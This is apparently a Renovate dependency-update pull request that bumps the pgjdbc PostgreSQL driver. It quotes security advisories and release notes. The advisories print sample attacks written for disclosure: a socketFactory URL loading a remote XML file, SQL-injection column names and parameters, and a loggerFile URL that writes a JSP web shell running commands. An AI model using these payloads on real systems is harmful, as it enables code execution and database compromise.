Update dependency org.postgresql:postgresql to v42.7.11 [SECURITY] #10

Open
renovate wants to merge 1 commit from renovate/maven-org.postgresql-postgresql-vulnerability into main
Member

This PR contains the following updates:

Package Type Update Change
org.postgresql:postgresql (source) dependencies minor 42.2.1842.7.11

⚠️ Warning

Some dependencies could not be looked up. Check the Dependency Dashboard for more information.


pgjdbc Does Not Check Class Instantiation when providing Plugin Classes

BIT-postgresql-jdbc-driver-2022-21724 / CVE-2022-21724 / GHSA-v7wg-cpwc-24m4

More information

Details

Impact

pgjdbc instantiates plugin instances based on class names provided via authenticationPluginClassName, sslhostnameverifier, socketFactory, sslfactory, sslpasswordcallback connection properties.

However, the driver did not verify if the class implements the expected interface before instantiating the class.

Here's an example attack using an out-of-the-box class from Spring Framework:

DriverManager.getConnection("jdbc:postgresql://node1/test?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://target/exp.xml");

The first impacted version is REL9.4.1208 (it introduced socketFactory connection property)

Severity

  • CVSS Score: 7.0 / 10 (High)
  • Vector String: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


PostgreSQL JDBC Driver SQL Injection in ResultSet.refreshRow() with malicious column names

BIT-postgresql-jdbc-driver-2022-31197 / CVE-2022-31197 / GHSA-r38f-c4h4-hqq2

More information

Details

Impact

What kind of vulnerability is it? Who is impacted?

The PGJDBC implementation of the java.sql.ResultRow.refreshRow() method is not performing escaping of column names so a malicious column name that contains a statement terminator, e.g. ;, could lead to SQL injection. This could lead to executing additional SQL commands as the application's JDBC user.

User applications that do not invoke the ResultSet.refreshRow() method are not impacted.

User application that do invoke that method are impacted if the underlying database that they are querying via their JDBC application may be under the control of an attacker. The attack requires the attacker to trick the user into executing SQL against a table name who's column names would contain the malicious SQL and subsequently invoke the refreshRow() method on the ResultSet.

For example:

CREATE TABLE refresh_row_example (
  id     int PRIMARY KEY,
  "1 FROM refresh_row_example; SELECT pg_sleep(10); SELECT * " int
);

This example has a table with two columns. The name of the second column is crafted to contain a statement terminator followed by additional SQL. Invoking the ResultSet.refreshRow() on a ResultSet that queried this table, e.g. SELECT * FROM refresh_row, would cause the additional SQL commands such as the SELECT pg_sleep(10) invocation to be executed.

As the multi statement command would contain multiple results, it would not be possible for the attacker to get data directly out of this approach as the ResultSet.refreshRow() method would throw an exception. However, the attacker could execute any arbitrary SQL including inserting the data into another table that could then be read or any other DML / DDL statement.

Note that the application's JDBC user and the schema owner need not be the same. A JDBC application that executes as a privileged user querying database schemas owned by potentially malicious less-privileged users would be vulnerable. In that situation it may be possible for the malicious user to craft a schema that causes the application to execute commands as the privileged user.

Patches

Has the problem been patched? What versions should users upgrade to?

Yes, versions 42.2.26, 42.3.7, and 42.4.1 have been released with a fix.

Workarounds

Is there a way for users to fix or remediate the vulnerability without upgrading?

Check that you are not using the ResultSet.refreshRow() method.

If you are, ensure that the code that executes that method does not connect to a database that is controlled by an unauthenticated or malicious user. If your application only connects to its own database with a fixed schema with no DDL permissions, then you will not be affected by this vulnerability as it requires a maliciously crafted schema.

Severity

  • CVSS Score: 7.1 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


TemporaryFolder on unix-like systems does not limit access to created files

BIT-postgresql-jdbc-driver-2022-41946 / CVE-2022-41946 / GHSA-562r-vg33-8x8h

More information

Details

Vulnerability

PreparedStatement.setText(int, InputStream)
and

PreparedStatemet.setBytea(int, InputStream)

will create a temporary file if the InputStream is larger than 51k

Example of vulnerable code:

String s = "some very large string greater than 51200 bytes";

PreparedStatement.setInputStream(1, new ByteArrayInputStream(s.getBytes()) );

This will create a temporary file which is readable by other users on Unix like systems, but not MacOS.

Impact
On Unix like systems, the system's temporary directory is shared between all users on that system. Because of this, when files and directories are written into this directory they are, by default, readable by other users on that same system.

This vulnerability does not allow other users to overwrite the contents of these directories or files. This is purely an information disclosure vulnerability.

When analyzing the impact of this vulnerability, here are the important questions to ask:

Is the driver running in an environment where the OS has other untrusted users.
If yes, and you answered 'yes' to question 1, this vulnerability impacts you.
If no, this vulnerability does not impact you.
Patches
Because certain JDK file system APIs were only added in JDK 1.7, this this fix is dependent upon the version of the JDK you are using.

Java 1.8 and higher users: this vulnerability is fixed in 42.2.27, 42.3.8, 42.4.3, 42.5.1
Java 1.7 users: this vulnerability is fixed in 42.2.27.jre7
Java 1.6 and lower users: no patch is available; you must use the workaround below.
Workarounds
If you are unable to patch, or are stuck running on Java 1.6, specifying the java.io.tmpdir system environment variable to a directory that is exclusively owned by the executing user will fix this vulnerability.

References
CWE-200: Exposure of Sensitive Information to an Unauthorized Actor
Fix commit 9008dc9aad
Similar Vulnerabilities
Google Guava - https://github.com/google/guava/issues/4011
Apache Ant - https://nvd.nist.gov/vuln/detail/CVE-2020-1945
JetBrains Kotlin Compiler - https://nvd.nist.gov/vuln/detail/CVE-2020-15824

Severity

  • CVSS Score: 4.7 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


org.postgresql:postgresql vulnerable to SQL Injection via line comment generation

BIT-postgresql-jdbc-driver-2024-1597 / CVE-2024-1597 / GHSA-24rp-q3w6-vc56

More information

Details

Impact

SQL injection is possible when using the non-default connection property preferQueryMode=simple in combination with application code that has a vulnerable SQL that negates a parameter value.

There is no vulnerability in the driver when using the default query mode. Users that do not override the query mode are not impacted.

Exploitation

To exploit this behavior the following conditions must be met:

  1. A placeholder for a numeric value must be immediately preceded by a minus (i.e. -)
  2. There must be a second placeholder for a string value after the first placeholder on the same line.
  3. Both parameters must be user controlled.

The prior behavior of the driver when operating in simple query mode would inline the negative value of the first parameter and cause the resulting line to be treated as a -- SQL comment. That would extend to the beginning of the next parameter and cause the quoting of that parameter to be consumed by the comment line. If that string parameter includes a newline, the resulting text would appear unescaped in the resulting SQL.

When operating in the default extended query mode this would not be an issue as the parameter values are sent separately to the server. Only in simple query mode the parameter values are inlined into the executed SQL causing this issue.

Example
PreparedStatement stmt = conn.prepareStatement("SELECT -?, ?");
stmt.setInt(1, -1);
stmt.setString(2, "\nWHERE false --");
ResultSet rs = stmt.executeQuery();

The resulting SQL when operating in simple query mode would be:

SELECT --1,'
WHERE false --'

The contents of the second parameter get injected into the command. Note how both the number of result columns and the WHERE clause of the command have changed. A more elaborate example could execute arbitrary other SQL commands.

Patch

Problem will be patched upgrade to 42.7.2, 42.6.1, 42.5.5, 42.4.4, 42.3.9, 42.2.28, 42.2.28.jre7

The patch fixes the inlining of parameters by forcing them all to be serialized as wrapped literals. The SQL in the prior example would be transformed into:

SELECT -('-1'::int4), ('
WHERE false --')
Workarounds

Do not use the connection propertypreferQueryMode=simple. (NOTE: If you do not explicitly specify a query mode then you are using the default of extended and are not impacted by this issue.)

Severity

  • CVSS Score: 10.0 / 10 (Critical)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


pgjdbc Arbitrary File Write Vulnerability

GHSA-673j-qm5f-xpv8

More information

Details

Overview

The connection properties for configuring a pgjdbc connection are not meant to be exposed to an unauthenticated attacker. While allowing an attacker to specify arbitrary connection properties could lead to a compromise of a system, that's a defect of an application that allows unauthenticated attackers that level of control.

It's not the job of the pgjdbc driver to decide whether a given log file location is acceptable. End user applications that use the pgjdbc driver must ensure that filenames are valid and restrict unauthenticated attackers from being able to supply arbitrary values. That's not specific to the pgjdbc driver either, it would be true for any library that can write to the application's local file system.

While we do not consider this a security issue with the driver, we have decided to remove the loggerFile and loggerLevel connection properties in the next release of the driver. Removal of those properties does not make exposing the JDBC URL or connection properties to an attacker safe and we continue to suggest that applications do not allow untrusted users to specify arbitrary connection properties. We are removing them to prevent misuse and their functionality can be delegated to java.util.logging.

If you identify an application that allows remote users to specify a complete JDBC URL or properties without validating it's contents, we encourage you to notify the application owner as that may be a security defect in that specific application.

Impact

It is possible to specify an arbitrary filename in the loggerFileName connection parameter
"jdbc:postgresql://localhost:5432/test?user=test&password=test&loggerLevel=DEBUG&loggerFile=./blah.jsp&<%Runtime.getRuntime().exec(request.getParameter("i"));%>"

This creates a valid JSP file which could lead to a Remote Code Execution

Patches

LoggerFile implementation has been removed and will be ignored by the driver, fixed in 42.3.3

Workarounds

sanitize the inputs to the driver

Reported by Allan Lou v3ged0ge@gmail.com

Severity

Moderate

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


Path traversal in org.postgresql:postgresql

BIT-postgresql-jdbc-driver-2022-26520 / CVE-2022-26520 / GHSA-727h-hrw8-jg8q

More information

Details

In pgjdbc before 42.3.3, an attacker (who controls the jdbc URL or properties) can call java.util.logging.FileHandler to write to arbitrary files through the loggerFile and loggerLevel connection properties. An example situation is that an attacker could create an executable JSP file under a Tomcat web root. NOTE: the vendor's position is that there is no pgjdbc vulnerability; instead, it is a vulnerability for any application to use the pgjdbc driver with untrusted connection properties.

Severity

Low

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


pgjdbc: Unbounded PBKDF2 iterations in SCRAM authentication allows CPU exhaustion DoS

BIT-postgresql-jdbc-driver-2026-42198 / CVE-2026-42198 / GHSA-98qh-xjc8-98pq

More information

Details

Summary

pgjdbc is vulnerable to a client-side denial of service during SCRAM-SHA-256 authentication.

Impact

A malicious server can instruct the driver to perform SCRAM authentication with a very large iteration count.
With a large enough value, the client spends an unbounded amount of CPU time inside PBKDF2 before authentication can fail.
A single attempt ties up a CPU core. Repeated or concurrent attempts exhaust client CPU and can wedge connection pools.

In affected versions, loginTimeout did not fully mitigate this problem. When loginTimeout expired, the caller could stop waiting, but the worker thread performing the connection attempt could continue running and burning CPU inside the SCRAM PBKDF2 computation.

This issue affects availability. It does not provide authentication bypass, privilege escalation, or direct password disclosure.

A user is vulnerable when all of the following are true:

  1. The connection uses SCRAM-SHA-256 authentication.
  2. The client reaches a malicious, compromised, or attacker-controlled PostgreSQL endpoint.
  3. That endpoint sends a very large SCRAM PBKDF2 iteration count in the server-first-message.

In practice, that can happen in these situations:

  • the application lets end users or tenants supply their own database connection details (as in many BI, reporting, analytics, ETL, and low-code platforms), so a user can point the shared client host at a server they control
  • the application accepts connection strings, hostnames, or JDBC URLs from user input, configuration uploaded by users, or other untrusted sources
  • the application is configured to connect to a PostgreSQL server that is itself malicious or later becomes compromised
  • the application connects through an untrusted proxy, relay, tunnel, bastion, or connection-pooling service that can act as the PostgreSQL server
  • an attacker can redirect the client to a fake PostgreSQL endpoint by manipulating DNS, service discovery, Kubernetes service resolution, /etc/hosts, environment variables, or similar indirection
  • an active network attacker on the path can impersonate the server because the connection does not strongly verify server identity (for example, sslmode lower than verify-full, or trusting a CA that signs hosts outside the operator's control)

The issue is more damaging when the application uses connection retries, many parallel connection attempts, or loginTimeout and assumes the timeout fully stops the work.

Patches

The patch introduces a new connection property, scramMaxIterations, with a default of 100K. The client now rejects SCRAM server messages that advertise more PBKDF2 iterations than the configured cap before starting the PBKDF2 computation begins.

Workarounds

Until a patched version of pgjdbc is deployed, the following measures reduce exposure:

  1. Only connect to trusted PostgreSQL servers whose identity is verified.
    Connect only to trusted PostgreSQL servers, and verify server identity with TLS using sslmode=verify-full and a trusted CA.
    TLS without certificate and hostname verification is not sufficient as an active network attacker can still impersonate the server.

  2. Do not rely on loginTimeout as a complete mitigation on unpatched versions.
    On affected versions, loginTimeout can stop the waiting caller while the worker thread continues spending CPU.

  3. Avoid SCRAM on untrusted or interceptable connection paths.
    For those paths, use an authentication method that does not let the server choose a SCRAM PBKDF2 iteration count.

  4. Reduce blast radius operationally.
    Limit parallel connection attempts, add retry backoff, isolate connection establishment in a separate worker or process when possible, and apply CPU or container limits where appropriate.

  5. On trusted servers you control, keep SCRAM iteration counts at ordinary values.
    This does not defend against an attacker-controlled server, but it avoids unnecessary client cost when talking to legitimate servers.

Severity

  • CVSS Score: 7.5 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


Release Notes

pgjdbc/pgjdbc (org.postgresql:postgresql)

v42.7.11

Security
  • fix: Limit SCRAM PBKDF2 iterations accepted from the server.
    pgjdbc was vulnerable to a client-side denial of service in SCRAM-SHA-256 authentication, where a malicious or compromised PostgreSQL server could specify an extremely large PBKDF2 iteration count, causing the client to consume unbounded CPU and potentially exhaust connection pools. The fix introduces a new scramMaxIterations connection property (defaulting to 100,000) to cap iteration counts before computation begins.
    See the Security Advisory for more detail.
    The following CVE-2026-42198 has been issued.
Added
  • feat: implement require_auth connection property, aligning with libpq behavior PR #​3895
Changed
  • chore: replace Appveyor CI with ikalnytskyi/action-setup-postgres PR #​3966
  • chore: upgrade Gradle to v9 PR #​3978
Fixed
  • fix: ensure extended protocol messages end with Sync message PR #​3728
  • fix: enable cursor-based fetching in extended protocol when transaction started via SQL command PR #​3996
  • fix: retry with SSL on IOException when sslMode=ALLOW PR #​3973
  • fix: make sure the driver honours connectTimeout when retrying the connection PR #​3968
  • fix: allow fallback to non-SSL connection when sslMode=prefer and sslResponseTimeout kicks in PR #​3968
  • fix: catch SecurityException from setContextClassLoader on ForkJoinPool workers PR #​3962
  • fix: use compareTo for LogSequenceNumber comparison to handle unsigned values correctly PR #​3961
  • fix: release COPY lock on IOException to prevent connection hang PR #​3957
  • fix: return jsonb as PGObject instead of String PR #​3956
  • fix: align SSL key file permission check with libpq PR #​3952
  • fix: guard connection closed flag with a reentrant lock to protect against concurrent close PR #​3905

v42.7.10

Changed
  • chore: Migrate to Shadow 9 PR 3931
  • style: fix empty line before javadoc for checkstyle compliance PR #​3925
  • style: fix lambda argument indentation for checkstyle compliance PR #​3922
  • test: add autosave=always|never|conservative and cleanupSavepoints=true|false to the randomized CI jobs PR #​3917
Fixed
  • fix: non-standard strings failing test for version 19 PR #​3934
  • fix: small issues in ConnectionFactoryImpl PR #​3929
  • fix: process pending responses before fastpath to avoid protocol errors PR # 3913
  • doc: use.md, fix typos PR #​3911
  • doc: datasource.md, fix minor formatting issue PR #​3912
  • doc: add the new PGP signing key to the official documentation PR #​3912
Reverted

v42.7.9

Added
  • feat: query timeout property PR #​3705
  • feat: Add PEMKeyManager to handle PEM based certs and keys PR #​3700
Changed
  • perf: optimize PGInterval.getValue() by replacing String.format with StringBuilder
  • doc: update property quoteReturningIdentifiers default value PR #​3847
  • security: Use a static method forName to load all user supplied classes. Use the Class.forName 3 parameter method and do not initilize it unless it is a subclass of the expected class
Fixed
  • fix: incorrect pg_stat_replication.reply_time calculation PR #​3906
  • fix: close temporary lob descriptors that are used internally in PreparedStatement#setBlob
  • fix: PGXAConnection.prepare(Xid) should return XA_RDONLY if the connection is read only PR #​3897
  • fix: make all Calendar instances proleptic Gregorian PR #​3837
  • fix: Simplify concurrency guards on QueryExecutorBase#transaction and QueryExecutorBase#standardConformingStrings PR #​3897
  • fix: avoid memory leaks in Java <= 21 caused by Thread.inheritedAccessControlContext PR #​3886
  • fix: Issue #​3784 pgjdbc can't decode numeric arrays containing special numbers like NaN PR #​3838
  • fix: use ssl_is_used() to check for ssl connection PR #​3867
  • fix: the classloader is nullable PR #​3907

v42.7.8

Added
  • feat: Add configurable boolean-to-numeric conversion for ResultSet getters PR #​3796
Changed
  • perf: remove QUERY_ONESHOT flag when calling getMetaData PR #​3783
  • perf: use BufferedInputStream with FileInputStream PR #​3750
  • perf: enable server-prepared statements for DatabaseMetaData
Fixed
  • fix: avoid NullPointerException when cancelling a query if cancel key is not known yet
  • fix: Change "PST" timezone in TimestampTest to "Pacific Standard Time" PR #​3774
  • fix: traverse the current dimension to get the correct pos in PgArray#calcRemainingDataLength PR #​3746
  • fix: make sure getImportedExportedKeys returns columns in consistent order
  • fix: Add "SELF_REFERENCING_COL_NAME" field to getTables' ResultSetMetaData to fix NullPointerException PR #​3660
  • fix: unable to open replication connection to servers < 12
  • fix: avoid closing statement caused by driver's internal ResultSet#close()
  • fix: return empty metadata for empty catalog names as it was before
  • fix: Incorrect class comparison in PGXmlFactoryFactory validation

v42.7.7

Security
  • security: Client Allows Fallback to Insecure Authentication Despite channelBinding=require configuration.
    Fix channel binding required handling to reject non-SASL authentication
    Previously, when channel binding was set to "require", the driver would silently ignore this
    requirement for non-SASL authentication methods. This could lead to a false sense of security
    when channel binding was explicitly requested but not actually enforced. The fix ensures that when
    channel binding is set to "require", the driver will reject connections that use
    non-SASL authentication methods or when SASL authentication has not completed properly.
    See the Security Advisory for more detail. Reported by George MacKerron
    The following CVE-2025-49146 has been issued
Added
  • test: Added ChannelBindingRequiredTest to verify proper behavior of channel binding settings

v42.7.6

Features
  • fix: Enhanced DatabaseMetadata.getIndexInfo() method, added index comment as REMARKS property PR #​3513
Performance Improvements
  • performance: Improve ResultSetMetadata.fetchFieldMetaData by using IN row values instead of UNION ALL for improved query performance (later reverted) PR #​3510
  • feat:Use a single simple query for all startup parameters, so groupStartupParameters is no longer needed PR #​3613

v42.7.5

Added
Fixed
  • regression: revert change in fc60537 PR #​3476
  • fix: PgDatabaseMetaData implementation of catalog as param and return value PR #​3390
  • fix: Support default GSS credentials in the Java Postgres client PR #​3451
  • fix: return only the transactions accessible by the current_user in XAResource.recover PR #​3450
  • feat: don't force send extra_float_digits for PostgreSQL >= 12 fix Issue #​3432 PR #​3446
  • fix: exclude "include columns" from the list of primary keys PR #​3434
  • perf: Enhance the meta query performance by specifying the oid. PR #​3427
  • feat: support getObject(int, byte[].class) for bytea PR #​3274
  • docs: document infinity and some minor edits PR #​3407
  • fix: Added way to check for major server version, fixed check for RULE PR #​3402
  • docs: fixed remaining paragraphs PR #​3398
  • docs: fixed paragraphs in javadoc comments PR #​3397
  • fix: Reuse buffers and reduce allocations in GSSInputStream addresses Issue #​3251 PR #​3255
  • chore: Update Gradle to 8.10.2 PR #​3388
  • fix: getSchemas() PR #​3386
  • fix: Update rpm postgresql-jdbc.spec.tpl with scram-client PR #​3324
  • fix: Clearing thisRow and rowBuffer on close() of ResultSet Issue #​3383 PR #​3384
  • fix: Package was renamed to maven-bundle-plugin PR #​3382
  • fix: As of version 18 the RULE privilege has been removed PR #​3378
  • fix: use buffered inputstream to create GSSInputStream PR #​3373
  • test: get rid of 8.4, 9.0 pg versions and use >= jdk version 17 PR #​3372
  • Changed docker-compose version and renamed script file in instructions to match the real file name PR #​3363
  • test:Do not assume "test" database in DatabaseMetaDataTransactionIsolationTest PR #​3364
  • try to categorize dependencies PR #​3362

v42.7.4

Added
  • chore: SCRAM dependency to 3.1 and support channel binding PR #​3188
  • chore: Add PostgreSQL 15, 16, and 17beta1 to CI tests PR #​3299
  • test: Update to 17beta3 PR #​3308
  • chore: Implement direct SSL ALPN connections PR #​3252
  • translation: Add Korean translation file PR #​3276
Fixed
  • fix: PgInterval ignores case for represented interval string PR #​3344
  • perf: Avoid extra copies when receiving int4 and int2 in PGStream PR #​3295
  • fix: Add support for Infinity::numeric values in ResultSet.getObject PR #​3304
  • fix: Ensure order of results for getDouble PR #​3301
  • perf: Replace BufferedOutputStream with unsynchronized PgBufferedOutputStream, allow configuring different Java and SO_SNDBUF buffer sizes PR #​3248
  • fix: Fix SSL tests PR #​3260
  • fix: Support bytea in preferQueryMode=simple PR #​3243
  • fix: Fix #​3234 - Return -1 as update count for stored procedure calls PR #​3235
  • fix: Fix #​3224 - conversion for TIME '24:00' to LocalTime breaks in binary-mode PR #​3225
  • perf: Speed up getDate by parsing bytes instead of String PR #​3141
  • fix: support PreparedStatement.setBlob(1, Blob) and PreparedStatement.setClob(1, Clob) for lobs that return -1 for length PR #​3136
  • fix: Validates resultset Params in PGStatement constructor. uses assertThro… PR #​3171
  • fix: Validates resultset parameters PR #​3167
  • docs: Replace greater to with greater than PR #​3315
  • docs: Clarify binaryTransfer and prepareThreshold PR #​3338
  • docs: use.md, typo PR #​3314
  • test: Use docker v2 which changes docker-compose to docker compose #​3339
  • refactor: Merge PgPreparedStatement#setBinaryStream int and long methods PR #​3165
  • test: Test both binaryMode=true,false when creating connections in DatabaseMetaDataTest PR #​3231
  • docs: Fixed typos in all source code and documentations PR #​3242
  • chore: Remove self-hosted runner PR #​3227
  • docs: Add cancelSignalTimeout in README PR #​3190
  • docs: Document READ_ONLY_MODE in README PR #​3175
  • test: Test for +/- infinity double values PR #​3294
  • test: Switch localhost and auth-test around for test-gss PR #​3343
  • fix: remove preDescribe from internalExecuteBatch PR #​2883
  • deps: Update dependency om.ongres.scram:scram-client to 3.2
Deprecated
  • test: Deprecate all PostgreSQL versions older than 9.1 PR #​3335

v42.7.3

Changed
Fixed
  • fix: boolean types not handled in SimpleQuery mode PR #​3146
    • make sure we handle boolean types in simple query mode
    • support uuid as well
    • handle all well known types in text mode and change else if to switch
  • fix: released new versions of 42.2.29, 42.3.10, 42.4.5, 42.5.6, 42.6.2 to deal with NoSuchMethodError on ByteBuffer#position when running on Java 8

v42.7.2

Security
  • security: SQL Injection via line comment generation, it is possible in SimpleQuery mode to generate a line comment by having a placeholder for a numeric with a -
    such as -?. There must be second placeholder for a string immediately after. Setting the parameter to a -ve value creates a line comment.
    This has been fixed in this version fixes CVE-2024-1597. Reported by Paul Gerste. See the security advisory for more details. This has been fixed in versions 42.7.2, 42.6.1 42.5.5, 42.4.4, 42.3.9, 42.2.28.jre7. See the security advisory for work arounds.
Changed
  • fix: Use simple query for isValid. Using Extended query sends two messages checkConnectionQuery was never ever set or used, removed PR #​3101
  • perf: Avoid autoboxing bind indexes by @​bokken in PR #​1244
  • refactor: Document that encodePassword will zero out the password array, and remove driver's default encodePassword by @​vlsi in PR #​3084
Added
  • feat: Add PasswordUtil for encrypting passwords client side PR #​3082

v42.7.1

Security
Added
  • feat: reWriteBatchedInserts now merges up to 32768 rows into one multi-values INSERT (bounded by the 65535 bind-parameter limit on the extended protocol) instead of capping at 128, which speeds up batches of few-column rows. The new reWriteBatchedInsertsSize connection property lowers that cap when set; the default of 0 uses that maximum.
  • feat: invalidate the prepared-statement cache after CREATE/DROP/ALTER so callers no longer trip on "cached plan must not change result type" without opting into autosave=ALWAYS. Controlled by the new flushCacheOnDdl connection property (default true); set to false for the prior behaviour.
  • feat: add connectExecutor connection property to customize the Executor used to run the worker task that performs the connection attempt when loginTimeout is in effect. The value is the fully qualified name of a class implementing java.util.concurrent.Executor. With a null value, the default, the driver retains the prior behavior of running the connection attempt on a daemon thread named "PostgreSQL JDBC driver connection thread". The executor must run the task on a thread other than the caller's. Running the attempt on a named thread lets applications that monitor driver-created threads identify it.
  • feat: add connectThreadFactory connection property to customize the ThreadFactory used to spawn the worker thread that runs the connection attempt when loginTimeout is in effect. The value is the fully qualified name of a class implementing java.util.concurrent.ThreadFactory. With a null value, the default, the driver retains the prior behavior of using a daemon thread named "PostgreSQL JDBC driver connection thread". Useful for testing timeout behaviour or for applications that want detailed control of all driver-created threads.
  • feat: add classLoaderStrategy connection property to control which classloaders the driver searches when loading a class named by a connection property, for example socketFactory. The default driver-first now falls back to the thread context classloader when the driver's classloader cannot resolve the class, which fixes class loading in non-flat class paths such as Quarkus and OSGi. Set driver to keep the previous driver-classloader-only behaviour, or context-first to prefer the thread context classloader Issue #​2112
Changed
  • refactor: the worker that runs the connection attempt under loginTimeout is now a FutureTask (ConnectTask) instead of the hand-rolled ConnectThread. When the caller hits the timeout, the task is now cancelled with cancel(true), which interrupts the worker thread rather than letting it run to completion. This makes the connection attempt interruptible, so loginTimeout can stop a slow connection attempt instead of leaking a thread. As before, a connection that the worker still manages to establish after the caller gives up is closed by the worker so that it does not leak. There are no public API changes and this should only lead to faster background resource cleanup for connections that time out.
  • chore: PGXAConnection.ConnectionHandler now rejects setAutoCommit(false) and setSavepoint(...) during an active XA branch, in addition to the long-rejected setAutoCommit(true) / commit() / rollback(). The setSavepoint rejection was already meant to be in place but the guard misspelled the method name as setSavePoint, so savepoints silently went through. Both changes bring the proxy in line with JTA 1.2 §3.4.
  • chore: commitPrepared / rollback-of-prepared now return XAER_RMFAIL instead of XAER_RMERR when the underlying connection is left in a non-idle TransactionState. Transaction managers (Geronimo, Narayana, Atomikos) treat XAER_RMFAIL as retryable on a fresh XAResource; the prepared transaction is no longer abandoned.
Fixed
  • fix: the published GitHub release now ships the released postgresql-<version>.jar and its detached PGP signature, taken from the same signed build that is uploaded to Maven Central, instead of a leftover SNAPSHOT jar Issue #​3812 PR #​3814
  • fix: simplify the Statement#cancel state machine by dropping the redundant CANCELLED state. killTimerTask now waits for the state to return to IDLE directly, which removes a spin-forever case when more than one thread observes the cancel completing PR #​1827.
  • perf: defer simple-query flushes until the driver reads the response, allowing BEGIN and the following query to share a network flush Issue #​3894
  • fix: reWriteBatchedInserts no longer throws IllegalArgumentException when batching a parameterless INSERT (for example INSERT INTO t VALUES (1, 2)) of 256 rows or more.
  • fix: a comment before CALL in a CallableStatement no longer hides the native call, so OUT parameter registration works for /* comment */ call proc(?, ?) and similar. Parser.modifyJdbcCall now skips leading whitespace and SQL comments (both -- and /* */) before the call, tolerates a trailing comment after a { ... } escape, and no longer adds a spurious comma when moving an OUT parameter into a call whose arguments are only a comment Issue #​2538
  • fix: PreparedStatement.toString() no longer throws for a bytea value supplied as text via PGobject. Hex-format values (\x...) are validated and rendered as a bytea literal, and escape-format values are quoted and cast like any other literal Issue #​3757
  • fix: the driver no longer nulls the contextClassLoader of shared ForkJoinPool.commonPool() worker threads, which previously left unrelated tasks on those threads running with a null classloader Issue #​4155
  • fix: getCharacterStream wraps String in StringReader PR #​4063
  • fix: PGXAConnection no longer saves and restores the underlying connection's JDBC autoCommit flag. All XA-protocol SQL (BEGIN, PREPARE TRANSACTION, COMMIT, ROLLBACK, COMMIT PREPARED, ROLLBACK PREPARED, the recover() SELECT) is sent through QUERY_SUPPRESS_BEGIN, so the caller's autoCommit value is invariant across every XAResource call. Fixes the "2nd phase commit must be issued using an idle connection" failure during recovery on managed datasources that pool connections with autoCommit=false (TomEE, WildFly, WebSphere Liberty).
  • fix: PGXAConnection.prepare() now mutates XA state only after PREPARE TRANSACTION succeeds. A failed PREPARE previously left the driver thinking the branch was already prepared, so the follow-up rollback(xid) tried ROLLBACK PREPARED against a non-existent gid and returned XAER_RMERR. Transaction managers (Narayana) escalated this to HeuristicMixedException. With the fix, rollback(xid) takes the active-branch path and issues a plain ROLLBACK, which the server accepts cleanly. Fixes Issue #​3153, Issue #​3123.
  • fix: an updatable result set over an unqualified table name is now classified using only the table visible through search_path. When two schemas held a table with the same name and the same primary or unique index name but a different set of key columns, the driver took the union of both schemas' columns, so the result set could be wrongly rejected as not updatable PR #​4214. Supersedes PR #​3400.

v42.7.0

Changed
  • fix: Deprecate for removal PGPoint.setLocation(java.awt.Point) to cut dependency to java.desktop module. PR #​2967
  • feat: return all catalogs for getCatalogs metadata query closes ISSUE #​2949 PR #​2953
  • feat: support SET statements combining with other queries with semicolon in PreparedStatement PR ##​2973
Fixed
  • chore: add styleCheck Gradle task to report style violations PR #​2980
  • fix: Include currentXid in "Error rolling back prepared transaction" exception message PR #​2978
  • fix: add varbit as a basic type inside the TypeInfoCache PR #​2960
  • fix: Fix failing tests for version 16. PR #​2962
  • fix: allow setting arrays with ANSI type name PR #​2952
  • feat: Use KeepAlive to confirm LSNs PR #​2941
  • fix: put double ' around log parameter PR #​2936 fixes ISSUE #​2935
  • fix: Fix Issue #​2928 number of ports not equal to number of servers in datasource PR #​2929
  • fix: Use canonical DateStyle name (#​2925) fixes pgbouncer issue
  • fix: Method getFastLong should be able to parse all longs PR #​2881
  • docs: Fix typos in info.html PR #​2860
  • fix: Return correct default from PgDatabaseMetaData.getDefaultTransactionIsolation PR #​2992 fixes Issue #​2991
  • test: fix assertion in RefCursorFetchTestultFetchSize rows
  • test: use try-with-resources in LogicalReplicationStatusTest

v42.6.0

Changed
  • fix: use PhantomReferences instead of Obejct.finalize() to track Connection leaks PR #​2847

    The change replaces all uses of Object.finalize with PhantomReferences.
    The leaked resources (Connections) are tracked in a helper thread that is active as long as
    there are connections in use. By default, the thread keeps running for 30 seconds after all
    the connections are released. The timeout is set with pgjdbc.config.cleanup.thread.ttl system property.

  • refactor:(loom) replace the usages of synchronized with ReentrantLock PR #​2635
    Fixes Issue #​1951

v42.5.4

Fixed
  • fix: fix testGetSQLTypeQueryCache by searching for xid type. We used to search for box type but it is now cached. xid is not cached, this nuance is required for the test.
  • fix OidValueCorrectnessTest BOX_ARRAY OID, by adding BOX_ARRAY to the oidTypeName map [PR #​2810]((#​2810).
  • fixes Issue #​2804.
  • fix: Make sure that github CI runs tests on all PRs #​2809.

v42.5.3

Fixed

v42.5.2

Changed
  • regression: This release has 2 known regressions which make it unusable see the notes above. We advise people to use 42.5.3 instead.
  • docs: specify that timeouts are in seconds and there is a maximum. Housekeeping on some tests fixes #Issue 2671 PR #​2686
  • docs: clarify binaryTransfer and add it to README PR# 2698
  • docs: Document the need to encode reserved characters in the connection URL PR #​2700
  • feat: Define binary transfer for custom types dynamically/automatically fixes Issue #​2554 PR #​2556
Added
  • fix: added gssResponseTimeout as part of PR #​2687 to make sure we don't wait forever on a GSS RESPONSE
Fixed

v42.5.1

Security
  • security: StreamWrapper spills to disk if setText, or setBytea sends very large Strings or arrays to the server. createTempFile creates a file which can be read by other users on unix like systems (Not macos).
